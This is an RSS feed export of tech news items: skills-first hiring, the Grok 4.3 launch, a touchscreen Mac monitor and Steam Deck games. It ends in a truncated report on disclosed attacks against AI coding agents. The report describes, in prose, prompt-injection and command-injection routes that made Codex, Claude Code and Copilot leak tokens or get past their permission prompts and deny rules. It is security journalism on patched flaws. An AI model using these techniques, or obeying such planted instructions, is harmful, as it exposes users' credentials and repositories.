<p>Second, they establish shared metrics across IT and HR. Organizations that get this right track 90-day performance reviews, first-year retention and promotion velocity alongside traditional recruiting metrics. <a href="https://www.teksystems.com/en/insights/success-stories/sentara-healthcare-success-story">In its New Collar Program with Sentara Healthcare</a>, TEKsystems worked with company leaders to fill open big data positions through a skills-based cohort model and achieved 80% retention one-year post-training.</p>



<p>Third, these CIOs build direct relationships with employer-aligned training pipelines before a role opens. <a href="https://newsroom.bankofamerica.com/content/newsroom/press-releases/2026/02/bofa-invests-nearly--40-million-into-american-workforce-skills-i.html" rel="nofollow">Bank of America invested nearly $40 million in workforce development initiatives in 2025 alone and partnered with more than 600 nonprofits across the US</a>.</p>



<p>At Per Scholas, our head of IT, Tyrone Washington, makes it clear that while technical skills might get you through the door, it’s “smart skills” — discernment, emotional intelligence, complex problem-solving and agility — that build a career in an AI-driven landscape.</p>



<h2 class="wp-block-heading">What the data shows</h2>



<p>Skills-first hiring, when paired with structured onboarding and development pathways, is not just a talent acquisition strategy — it’s a retention strategy. And higher retention contributes directly to the bottom line, as <a href="https://www.gallup.com/workplace/247391/fixable-problem-costs-businesses-trillion.aspx">the fully loaded cost of replacing a technical employee ranges from one to two times their annual salary</a>.</p>



<p><a href="https://www.teksystems.com/en/insights/success-stories/future-forward-workforce-program" rel="nofollow">In one employer partnership deploying skills-trained talent</a>, a TEKsystems client came out $238,000 ahead in the first year after accounting for program costs, with a projected annual return of over $1.2 million. IT leaders reported that skills-trained talent becomes productive measurably faster than early-career hires from conventional pipelines.</p>



<h2 class="wp-block-heading">How CIOs can lead the Shift — even without owning HR</h2>



<p>CIOs who are moving the needle are piloting skills-based hiring for one or two roles, tracking outcomes rigorously and using that data to make the case for broader adoption. They’re building external partnerships before they need them. Bank of America, a Per Scholas long-term partner, knows that our graduates are team players, lifelong learners and motivated employees; our graduates’ certifications (through CompTIA and Google) validates that they have the technical know-how.</p>



<p>Every quarter that technical roles sit open has a measurable impact on project delivery, team capacity and competitive positioning. Surfacing these costs — backed by data — is something CIOs are uniquely positioned to do.</p>



<h2 class="wp-block-heading">The bottom line</h2>



<p>Skills-first hiring will remain a well-intentioned abstraction unless CIOs treat it as an operating model — one that reflects how AI is reshaping the skills organizations need.</p>



<p>The candidates who can demonstrate hands-on experience in building and deploying AI agents, integrating multiple AI tools into a workflow or evaluating when AI can help are the ones who will drive value. But they’ll keep getting filtered out unless CIOs get specific about skill definitions, align IT and HR around shared metrics, and build employer-aligned pipelines. Bank of America and TEKsystems didn’t achieve their results by endorsing a principle — they achieved them by building systems.</p>



<p>Luckily, building systems is something that CIOs know how to do well.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[xAI launches Grok 4.3 at an aggressively low price and a new, fast, powerful voice cloning suite]]></title>
<description><![CDATA[While Elon Musk faces off against his former colleague and OpenAI co-founder Sam Altman in court, Musk's rival firm xAI, founded to take on OpenAI, isn't slowing down on launching competitive new products and services.Last night, xAI shipped a new, proprietary base large language model (LLM), Gro...]]></description>
<link>https://tsecurity.de/de/3481020/it-nachrichten/xai-launches-grok-43-at-an-aggressively-low-price-and-a-new-fast-powerful-voice-cloning-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3481020/it-nachrichten/xai-launches-grok-43-at-an-aggressively-low-price-and-a-new-fast-powerful-voice-cloning-suite/</guid>
<pubDate>Fri, 01 May 2026 20:32:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While Elon Musk faces off against his former colleague and OpenAI co-founder Sam Altman in <a href="https://www.theverge.com/ai-artificial-intelligence/920775/evidence-exhibits-elon-musk-sam-altman-openai-trial">court</a>, Musk's rival firm xAI, founded to take on OpenAI, isn't slowing down on launching competitive new products and services.</p><p>Last night, <a href="https://x.com/elonmusk/status/2050034277375672520">xAI shipped a new, proprietary base large language model (LLM), Grok 4.3</a>, and a <a href="https://console.x.ai/team/default/voice/voice-library">new voice cloning suite</a> on the web. </p><p>The new products arrive after months of tumult from xAI that <a href="https://www.fastcompany.com/91531084/inside-the-xai-exodus">saw all of Musk's 10 original co-founders of the lab</a> and dozens more researchers exit the firm and Grok was eclipsed on performance by many new competing LLMs from the likes of OpenAI, Anthropic, Google, and Chinese firms DeepSeek, Moonshot (Kimi), Alibaba (Qwen), z.ai,  and others. </p><p>While Grok 4.3 does mark a significant leap in performance on third-party benchmarks over its direct predecessor Grok 4.2, according to the independent AI model evaluation firm <a href="https://artificialanalysis.ai/models/grok-4-3">Artificial Analysis</a>, it still remains below the state-of-the-art set by OpenAI and Anthropic's latest models.</p><div></div><p>But the marquee feature of the Grok brand has — other than Musk's stated opposition to "<a href="https://abc3340.com/news/nation-world/elon-musk-says-wokeness-is-divisive-exclusionary-and-hateful?photo=1">wokeness</a>" and its more freewheeling personality and<a href="https://www.bbc.com/news/articles/cgk2lzmm22eo"> image generation policy</a> — increasingly been its low price point when accessed by developers and users via the xAI application programming interface (API), a trend only furthered by Grok 4.3, which costs $1.25 per million input tokens and $2.50 per million output tokens (up to 200,000 input tokens, at which point costs double, a common pricing strategy of leading AI labs) compared to its direct predecessor Grok 4.2's initial API pricing of $2/$6 per million input/output tokens.</p><p>According to <a href="https://grok.com/release-notes">xAI's release notes</a>, Grok 4.3 began beta testing in April for subscribers to xAI's <a href="https://grok.com/plans">SuperGrok</a> ($30 monthly) plan, and those of its sibling social network, <a href="https://x.com/i/premium_sign_up">X, through its Premium+ plan</a> ($40 monthly with 50% for first two months).  Now it's available to all through the <a href="https://docs.x.ai/developers/models/grok-4.3">xAI API</a> and through partner <a href="https://x.com/OpenRouter/status/2049996465263759563">OpenRouter</a>. </p><h2><b>Reasoning baked-in and agentic tool-use capabilities</b></h2><p>At the core of Grok 4.3 is a fundamental shift in how the model processes information. Unlike previous iterations where "chain-of-thought" or reasoning could often be toggled or configured by effort levels, Grok 4.3 is built with reasoning as an active, permanent state. </p><p>This means the model is designed to "think" before it speaks for every query, a strategy intended to maximize factual accuracy and the handling of complex, multi-step instructions.</p><p>The model’s memory is equally expansive, featuring a <b>1 million-token context window</b>. To put this in perspective, a million tokens is roughly equivalent to several thick novels or the entire codebase of a mid-sized application. </p><p>This allows Grok 4.3 to maintain coherence over massive datasets, though xAI has implemented a "Higher context pricing" structure for requests that exceed the 200,000-token threshold. </p><p>This tiering suggests that while the "long-term memory" is available, the computational cost of managing that much information remains a significant overhead.Technically, the model accepts both text and image inputs, outputting text. </p><p>It is specifically optimized for <b>agentic workflows</b>—scenarios where an AI is not just answering a question but acting as an autonomous agent to complete a task. </p><p>For the first time, Grok has access to the same tools and environments a human professional would use. Evidence of this shift is visible in early user interactions:</p><ul><li><p><b>Spreadsheet Engineering</b>: In one instance, the model spent <b>6 minutes and 22 seconds</b> in a "thought" phase to build a comprehensive OSRS Sailing Combat DPS analyzer. The resulting <code>.xlsx</code> file wasn't a simple table but a multi-sheet dashboard including a "Reference_Data" set and a complex "DPS_Calculator" with formulaic auto-calculations.</p></li><li><p><b>Professional Documentation</b>: Grok now generates formatted PDFs, such as 12-page reports on SpaceX products. These documents incorporate branding, logos, hero images, and structured tables, moving well beyond the markdown blocks of previous iterations.</p></li><li><p><b>Visual Presentations</b>: The model can design 9-slide PowerPoint decks, utilizing a "Sandwich Structure" (dark titles/conclusions with light content) and integrating data-driven decision matrices and humor.</p></li></ul><p>However, its knowledge of the world is not infinite; the release notes list a knowledge cut-off date of December 2025. Yet, thanks to built-in web search, Grok can reference and use up-to-date information. </p><p>In fact, Grok 4.3 arrives with an enhanced ecosystem of tools designed to make it a functional digital employee. The xAI platform now offers a robust set of server-side tools that the model can invoke autonomously based on the complexity of the query.</p><ul><li><p><b>Web and X Search</b>: These tools allow Grok to bypass its knowledge cutoff by browsing the live internet or searching X (formerly Twitter) posts, user profiles, and threads.</p></li><li><p><b>Code Execution</b>: The model can run Python code in a sandboxed environment to solve mathematical problems or process data.</p></li><li><p><b>File and Collections Search</b>: A built-in Retrieval-Augmented Generation (RAG) system allows users to query uploaded document collections or search through specific file attachments.</p></li></ul><h2><b>xAI's Custom Voices let you clone your voice at high quality in a minute or two</b></h2><p>Beyond text, xAI has introduced <b>Custom Voices</b>, a sophisticated voice-cloning API and web-based voice cloning creation suite. </p><p>This product allows developers to clone a voice from a reference audio clip as short as 120 seconds. Once cloned, the "voice ID" can be used across xAI’s Text-to-Speech (TTS) and Voice Agent APIs.</p><p>xAI's documentation emphasizes that this is not merely about timbre; the model is designed to pick up delivery patterns. </p><p>If a user records a reference clip in a "customer support" style, the resulting AI voice will mimic that helpful, professional inflection. </p><p>Despite the creative potential, xAI has placed strict geographic limits on this feature, making it available only in the United States, with a notable exception for Illinois due to regional biometric and privacy regulations.</p><p>While the console playground is open for general use, programmatic access via the <code>POST /v1/custom-voices</code> endpoint is currently gated to teams on an Enterprise plan. </p><p>I tried it myself and after moving through the requisite voice sampling screens on the web — the tool asks you to read aloud several passages of unrelated dialog — I indeed had a copy of my voice that sounded eerily identical to mine and accurately pronounced new words the same way I would when reading allowed from a new script it was given.</p><p>You can delete your custom voices in one click on xAI's Custom Voices web application and create up to 30 new ones at a time.</p><p>In terms of licensing, the Custom Voices feature is strictly "scoped to your team" and is never made available to other users, ensuring a private, commercial license for corporate assets. </p><p>Access to the new Voice Agent API (<code>grok-voice-think-fast-1.0</code>) is billed at a flat rate of $3.00 per hour ($0.05 per minute) for speech-to-speech interactions. This is on the low-medium end of costs for other competing voice agents, according to my research:</p><table><tbody><tr><td><p><b>Service</b></p></td><td><p><b>Price per 1k Characters</b></p></td><td><p><b>Estimated Cost per Minute</b></p></td><td><p><b>Estimated Cost per Hour</b></p></td></tr><tr><td><p><b>OpenAI TTS (Standard)</b></p></td><td><p>$0.015</p></td><td><p>~$0.015</p></td><td><p>~$0.90</p></td></tr><tr><td><p><b>OpenAI TTS (HD)</b></p></td><td><p>$0.030</p></td><td><p>~$0.030</p></td><td><p>~$1.80</p></td></tr><tr><td><p><b>Grok Voice Agent</b></p></td><td><p></p></td><td><p><b>$0.05</b></p></td><td><p><b>$3.00</b></p></td></tr><tr><td><p><b>ElevenLabs (Starter)</b></p></td><td><p>~$0.30</p></td><td><p>~$0.30</p></td><td><p>~$18.00</p></td></tr><tr><td><p><b>ElevenLabs (Pro)</b></p></td><td><p>~$0.18</p></td><td><p>~$0.18</p></td><td><p>~$10.80</p></td></tr><tr><td><p><b>Play.ht</b></p></td><td><p>~$0.20</p></td><td><p>~$0.20</p></td><td><p>~$12.00</p></td></tr><tr><td><p><b>Azure/Google Cloud</b></p></td><td><p>$0.016 - $0.024</p></td><td><p>~$0.02</p></td><td><p>~$1.00 - $1.50</p></td></tr></tbody></table><p>Complementing this is the standalone Text-to-Speech (TTS) service, which offers five distinct voices (Eve, Ara, Rex, Sal, and Leo) and is priced at $4.20 per 1 million characters. </p><p>For transcription needs, the Speech-to-Text (STT) API provides real-time streaming at $0.20 per hour, while batch processing is available at a discounted rate of $0.10 per hour. </p><p>To ensure security for client-side applications, xAI utilizes Ephemeral Tokens, allowing for secure WebSocket connections without exposing primary API keys.</p><p>Once created, these voices are private to the user's team and can be used across all voice APIs by referencing a unique 8-character alphanumeric <code>voice_id</code>. </p><p>For highly regulated sectors, xAI maintains production-ready standards, including SOC 2 Type II auditing, HIPAA eligibility for healthcare workloads, and GDPR compliance.</p><h2><b>Aggressively low API pricing as a differentiator</b></h2><p>The most aggressive aspect of the Grok 4.3 announcement is its pricing structure. Bindu Reddy, CEO of enterprise assistant startup Abacus AI <a href="https://x.com/bindureddy/status/2050028784242536585">noted on X</a> that the model is "as smart as Sonnet 4.6 and 5x cheaper and faster". </p><p>The standard API rates are set at $1.25 per million input tokens and $2.50 per million output tokens. This reflects a significant reduction in cost compared to its predecessor, Grok 4.20, with Artificial Analysis reporting an approximately<b> 40% lower input price and 60% lower output price.</b></p><p>According to our calculations at VentureBeat, that places Grok-4.3 firmly in the lowest cost half of all major foundation models, far closer to Chinese open source offerings than its U.S. proprietary rivals:</p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input</b></p></td><td><p><b>Output</b></p></td><td><p><b>Total Cost</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>Grok 4.1 Fast</p></td><td><p>$0.20</p></td><td><p>$0.50</p></td><td><p>$0.70</p></td><td><p><a href="https://docs.x.ai/docs/pricing">xAI</a></p></td></tr><tr><td><p>MiniMax M2.7</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/docs/guides/models-intro">MiniMax</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>Gemini 3 Flash</p></td><td><p>$0.50</p></td><td><p>$3.00</p></td><td><p>$3.50</p></td><td><p><a href="https://ai.google.dev/pricing">Google</a></p></td></tr><tr><td><p>Kimi-K2.5</p></td><td><p>$0.60</p></td><td><p>$3.00</p></td><td><p>$3.60</p></td><td><p><a href="https://platform.moonshot.cn/docs/pricing">Moonshot</a></p></td></tr><tr><td><p><b>Grok 4.3</b></p></td><td><p><b>$1.25</b></p></td><td><p><b>$2.50</b></p></td><td><p><b>$3.75</b></p></td><td><p><b></b><a href="https://docs.x.ai/developers/models/grok-4.3"><b>xAI</b></a></p></td></tr><tr><td><p>GLM-5</p></td><td><p>$1.00</p></td><td><p>$3.20</p></td><td><p>$4.20</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GLM-5-Turbo</p></td><td><p>$1.20</p></td><td><p>$4.00</p></td><td><p>$5.20</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>DeepSeek V4 Pro</p></td><td><p>$1.74</p></td><td><p>$3.48</p></td><td><p>$5.22</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>GLM-5.1</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Claude Haiku 4.5</p></td><td><p>$1.00</p></td><td><p>$5.00</p></td><td><p>$6.00</p></td><td><p><a href="https://www.anthropic.com/pricing">Anthropic</a></p></td></tr><tr><td><p>Qwen3-Max</p></td><td><p>$1.20</p></td><td><p>$6.00</p></td><td><p>$7.20</p></td><td><p><a href="https://www.alibabacloud.com/help/en/model-studio/developer-reference/model-pricing">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3 Pro</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Claude Opus 4.7</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr></tbody></table><p>However, the "reasoning" nature of the model introduces a new billing category: Reasoning tokens. </p><p>These are tokens generated during the model's internal thinking process and are billed at the same rate as standard completion tokens. Effectively, users pay for the AI to "think" before it provides the final answer. xAI has also introduced several unique fee structures:</p><ul><li><p><b>Prompt Caching</b>: Repeated prompts are significantly cheaper, at <b>$0.20 per million tokens</b>, incentivizing developers to reuse context.</p></li><li><p><b>Tool Invocations</b>: While token usage for tools is billed at standard rates, the act of invoking a tool carries a flat fee—$5.00 per 1,000 calls for Web Search or Code Execution, and $10.00 for File Attachments.</p></li><li><p><b>Usage Guideline Violation Fee</b>: In a move that may set a new industry precedent, xAI charges a <b>$0.05 fee</b> for requests that are blocked by their safety filters before generation even begins.</p></li></ul><p>The model itself remains accessible via a standard commercial API, with xAI recommending that all developers migrate to <code>grok-4.3</code> as their "most intelligent and fastest model".</p><h2><b>Third-party benchmark evaluations and analysis</b></h2><p>The reception of Grok 4.3 has been polarized, depending largely on the specific use case. Professional benchmarkers and developers have highlighted a "stark gap" between the model's domain-specific strengths and its general reasoning consistency.</p><div></div><p>According to <a href="https://x.com/ValsAI/status/2049979820227063953">independent AI evaluation firm Vals AI</a>, Grok 4.3 has taken the top spot on several specialized indices. It currently ranks #1 on CaseLaw v2 (79.3% accuracy) and #1 on CorpFin. </p><p>This 25-point jump in legal reasoning over Grok 4.20 suggests that the "always-on reasoning" architecture is particularly well-suited for the dense, logical structures of law and finance. </p><p><a href="https://x.com/ArtificialAnlys/status/2049987001655714250">Artificial Analysis corroborated</a> this performance, noting a massive improvement in agentic tasks, scoring an Elo of 1500 on the GDPval-AA benchmark, surpassing competitors like Gemini 3.1 Pro and GPT-5.4 mini.</p><p>Conversely, users focused on general-purpose agents and coding have highlighted deficiencies. </p><p>AI automated brick-and-mortar retail company <a href="https://x.com/andonlabs/status/2050056965460734325">Andon Labs reported that Grok 4.3 is a "big regression"</a> on the Vending-Bench 2, which measures an AI's ability to take consistent actions in a simulation. </p><p>They colorfully described the model as having "narcolepsy problems," preferring to remain inactive for multiple simulation days rather than taking the required actions.</p><p>The sentiment was echoed by Vals AI, which noted that while the model improved in some coding areas, it remains weak on general coding tasks and "struggles with difficult math problems," scoring only 11% on ProofBench.</p><h2><b>Should your enterprise use Grok 4.3?</b></h2><p>The launch of Grok 4.3 represents a calculated bet by xAI that the market wants <b>specialized brilliance</b> and <b>extreme cost efficiency</b> over a perfectly balanced generalist. </p><p>By achieving a score of 53 on the Artificial Analysis Intelligence Index while remaining on the "Pareto frontier" of cost-per-intelligence, xAI is positioning itself as the "value" leader for enterprise applications in legal and financial tech.</p><p>The "always-on reasoning" is a double-edged sword. While it provides the depth needed to navigate complex case law, the community reports of "narcolepsy" suggest that a model that is always "thinking" may occasionally think itself into a state of paralysis, or at least a state of excessive caution that inhibits agentic action.</p><p>In addition, prior Grok model scandals including an X chatbot version referring to itself as "<a href="https://www.npr.org/2025/07/09/nx-s1-5462609/grok-elon-musk-antisemitic-racist-content">MechaHitler</a>" and posting antisemitic content, <a href="https://www.nbcnews.com/tech/tech-news/musks-ai-chatbot-grok-xai-making-sexual-deepfakes-imagine-rcna265855">sexualized deepfake imagery generation</a> and <a href="https://www.bbc.com/news/articles/clye99wg0y8o">investigations</a>, and r<a href="https://venturebeat.com/ai/elon-musks-xai-tries-to-explain-groks-south-african-race-relations-freakout-the-other-day">eferences to racial conflicts</a> and <a href="https://venturebeat.com/ai/musks-attempts-to-politicize-his-grok-ai-are-bad-for-users-and-enterprises-heres-why">right-wing dog whistle framing of social issues</a> — which appear to mirror many of founder Musk's own positions, to the point that the model was at one point,<a href="https://www.cnbc.com/2025/07/11/grok-4-appears-to-reference-musks-views-when-answering-questions-.html"> checking Musk's own X account before responding in its X implementation</a> — nearly certain to give some enterprises pause when considering adoption. It's unclear whether any of those issues remain with Grok 4.3, but one user did note that <a href="https://x.com/lefthanddraft/status/2050021868229611654">Grok's system prompt appears</a> to instruct it <!-- -->"you do not assign broad positive/negative utility functions to groups of people."<!-- -->  </p><p>For developers, the decision to adopt Grok 4.3 will likely come down to the nature of their data. For those needing to process a million tokens of legal documents at a fraction of the cost of Claude 4.6 or GPT-5.5, Grok 4.3 is a clear front-runner. </p><p>For those building high-frequency autonomous agents or complex math solvers, the "narcolepsy" and coding regressions suggest that xAI's latest model may still need a few more "tuning passes".</p><p>As <a href="https://x.com/OpenRouter/status/2049996465263759563">OpenRouter noted on X upon making the model live</a>, the "large jump in agentic performance" at a lower price point is an undeniable milestone. Whether that performance can be sustained across all domains remains the primary question for the summer of 2026.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's what using a touchscreen Mac may be like]]></title>
<description><![CDATA[For years, Apple has been rumored to be bringing native touch functionality to the Mac. A new display gives us an early look at what that may be like, for better and worse.Aspekt Touch is like an early version of a touchscreen MacRecently, I got an early look at the Aspekt Touch, a new monitor fr...]]></description>
<link>https://tsecurity.de/de/3480843/ios-mac-os/heres-what-using-a-touchscreen-mac-may-be-like/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3480843/ios-mac-os/heres-what-using-a-touchscreen-mac-may-be-like/</guid>
<pubDate>Fri, 01 May 2026 18:39:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For years, Apple has been rumored to be bringing native touch functionality to the Mac. A new display gives us an early look at what that may be like, for better and worse.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67497-142151-alogic-touch-display-xl.jpg" alt="Modern desktop setup with a large monitor editing a photo, Mac mini-style computer underneath, keyboard and mouse, small desk plants, and tech accessories on a clean, well-lit workstation"><br><span>Aspekt Touch is like an early version of a touchscreen Mac</span></div><br>Recently, I got an early look at the Aspekt Touch, a new monitor from Alogic. This isn't the first touchscreen monitor from the brand, but the tilt functionality combined with <a href="https://appleinsider.com/inside/macos-tahoe" title="macOS Tahoe" data-kpt="1">macOS Tahoe</a> gives early impressions about how a first-party solution could be implemented.<br><br>Feel free to check out Mike's <a href="https://appleinsider.com/articles/26/04/17/aspekt-touch-4k-monitor-with-mac-mini-dock-is-cool-but-2200-is-too-expensive">initial hands-on</a> of the Aspekt Touch, but here's the high-level. It's a 32-inch 4K display that is also able to house a <a href="https://appleinsider.com/inside/mac-mini" title="Mac mini" data-kpt="1">Mac mini</a> in the bottom of the stand, and it can tilt nearly flat to be used more comfortably as a touchscreen.<br><br><br> <a href="https://appleinsider.com/articles/26/05/01/heres-what-using-a-touchscreen-mac-may-be-like?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244218?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's the top Steam Deck games for April 2026]]></title>
<description><![CDATA[Another month is done and dusted, so here's your run over the most popular games on Steam Deck for April 2026. No real surprises for what's in the top.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3480327/linux-tipps/heres-the-top-steam-deck-games-for-april-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3480327/linux-tipps/heres-the-top-steam-deck-games-for-april-2026/</guid>
<pubDate>Fri, 01 May 2026 14:24:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Another month is done and dusted, so here's your run over the most popular games on Steam Deck for April 2026. No real surprises for what's in the top.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1633401831id28940gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/05/heres-the-top-steam-deck-games-for-april-2026/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Code, Copilot and Codex all got hacked. Every attacker went for the credential, not the model.]]></title>
<description><![CDATA[On March 30, BeyondTrust proved that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext. OpenAI classified it Critical P1. Two days later, Anthropic’s Claude Code source code spilled onto the public npm registry, and within hours, Adversa found Claude Code silently ignored ...]]></description>
<link>https://tsecurity.de/de/3478558/it-nachrichten/claude-code-copilot-and-codex-all-got-hacked-every-attacker-went-for-the-credential-not-the-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478558/it-nachrichten/claude-code-copilot-and-codex-all-got-hacked-every-attacker-went-for-the-credential-not-the-model/</guid>
<pubDate>Thu, 30 Apr 2026 20:02:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On March 30, <a href="https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token">BeyondTrust</a> proved that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext. OpenAI classified it Critical P1. Two days later, Anthropic’s Claude Code source code <a href="https://venturebeat.com/technology/claude-codes-source-code-appears-to-have-leaked-heres-what-we-know">spilled onto the public npm registry</a>, and within hours, <a href="https://adversa.ai/blog/claude-code-security-bypass-deny-rules-disabled/">Adversa</a> found Claude Code silently ignored its own deny rules once a command exceeded 50 subcommands. These were not isolated bugs. They were the latest in a nine-month run: six research teams disclosed exploits against Codex, Claude Code, Copilot, and Vertex AI, and every exploit followed the same pattern. An AI coding agent held a credential, executed an action, and authenticated to a production system without a human session anchoring the request.</p><p>The attack surface was first demonstrated at Black Hat USA 2025, when Zenity CTO <a href="https://labs.zenity.io/p/hsc25">Michael Bargury hijacked</a> ChatGPT, Microsoft Copilot Studio, Google Gemini, Salesforce Einstein and Cursor with Jira MCP on stage with zero clicks. Nine months later, those credentials are what attackers reached.</p><p>Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, named the failure in an exclusive VentureBeat interview. “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system.” The credentials underneath the interface are the breach.</p><h2>Codex, where a branch name stole GitHub tokens</h2><p><a href="https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token">BeyondTrust</a> researcher Tyler Jespersen, with Fletcher Davis and Simon Stewart, found Codex cloned repositories using a GitHub OAuth token embedded in the git remote URL. During cloning, the branch name parameter flowed unsanitized into the setup script. A semicolon and a backtick subshell turned the branch name into an exfiltration payload.</p><p>Stewart added the stealth. By appending 94 Ideographic Space characters (Unicode U+3000) after “main,” the malicious branch looked identical to the standard main branch in the Codex web portal. A developer sees “main.” The shell sees curl exfiltrating their token. OpenAI classified it Critical P1 and shipped full remediation by February 5, 2026.</p><h2>Claude Code, where two CVEs and a 50-subcommand bypass broke the sandbox</h2><p><a href="https://www.sentinelone.com/vulnerability-database/cve-2026-25723/">CVE-2026-25723</a> hit Claude Code’s file-write restrictions. Piped sed and echo commands escaped the project sandbox because command chaining was not validated. Patched in 2.0.55. <a href="https://www.sentinelone.com/vulnerability-database/cve-2026-33068/">CVE-2026-33068</a> was subtler. Claude Code resolved permission modes from .claude/settings.json before showing the workspace trust dialog. A malicious repo set permissions.defaultMode to bypassPermissions. The trust prompt never appeared. Patched in 2.1.53.</p><p>The 50-subcommand bypass landed last. Adversa found that Claude Code silently dropped deny-rule enforcement once a command exceeded 50 subcommands. Anthropic’s engineers had traded security for speed and stopped checking after the fiftieth. Patched in 2.1.90.</p><p>“A significant vulnerability in enterprise AI is broken access control, where the flat authorization plane of an LLM fails to respect user permissions,” wrote Carter Rees, VP of AI and Machine Learning at <a href="https://reputation.com/">Reputation</a> and a member of the Utah AI Commission. The repository decided what permissions the agent had. The token budget decided which deny rules survived.</p><h2>Copilot, where a pull request description and a GitHub issue both became root</h2><p><a href="https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/">Johann Rehberger</a> demonstrated <a href="https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/">CVE-2025-53773</a> against GitHub Copilot with <a href="https://www.persistent-security.net/post/part-iii-vscode-copilot-wormable-command-execution-via-prompt-injection">Markus Vervier of Persistent Security</a> as co-discoverer. Hidden instructions in PR descriptions triggered Copilot to flip auto-approve mode in .vscode/settings.json. That disabled all confirmations and granted unrestricted shell execution across Windows, macOS, and Linux. Microsoft patched it in the August 2025 Patch Tuesday release.</p><p>Then, <a href="https://orca.security/resources/blog/roguepilot-github-copilot-vulnerability/">Orca Security</a> cracked Copilot inside GitHub Codespaces. Hidden instructions in a GitHub issue manipulated Copilot into checking out a malicious PR with a symbolic link to /workspaces/.codespaces/shared/user-secrets-envs.json. A crafted JSON $schema URL exfiltrated the privileged GITHUB_TOKEN. Full repository takeover. Zero user interaction beyond opening the issue.</p><p>Mike Riemer, CTO at Ivanti, framed the speed dimension in a VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within 72 hours of release, they’re open to exploit.” Agents compress that window to seconds.</p><h2>Vertex AI, where default scopes reached Gmail, Drive and Google’s own supply chain</h2><p><a href="https://unit42.paloaltonetworks.com/double-agents-vertex-ai/">Unit 42</a> researcher Ofir Shaty found that the default Google service identity attached to every Vertex AI agent had excessive permissions. Stolen P4SA credentials granted unrestricted read access to every Cloud Storage bucket in the project and reached restricted, Google-owned Artifact Registry repositories at the core of the Vertex AI Reasoning Engine. Shaty described the compromised P4SA as functioning like a "double agent," with access to both user data and Google's own infrastructure.</p><h2>VentureBeat defense grid</h2><table><tbody><tr><td><p><b>Security requirement</b></p></td><td><p><b>Defense shipped</b></p></td><td><p><b>Exploit path</b></p></td><td><p><b>The gap</b></p></td></tr><tr><td><p>Sandbox AI agent execution</p></td><td><p>Codex runs tasks in cloud containers; token scrubbed during agent runtime.</p></td><td><p>Token present during cloning. Branch-name command injection executed before cleanup.</p></td><td><p>No input sanitization on container setup parameters.</p></td></tr><tr><td><p>Restrict file system access</p></td><td><p>Claude Code sandboxes writes via accept-edits mode.</p></td><td><p>Piped sed/echo escaped sandbox (CVE-2026-25723). 